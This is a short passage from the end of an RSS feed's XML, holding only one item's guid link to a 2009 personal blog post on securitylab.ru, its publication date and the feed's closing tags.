      <guid>http://www.securitylab.ru/blog/personal/tecklord/10225.php</guid>
      <pubDate>Wed, 21 Oct 2009 17:01:34 +0400</pubDate>
    </item>

  </channel>
</rss>
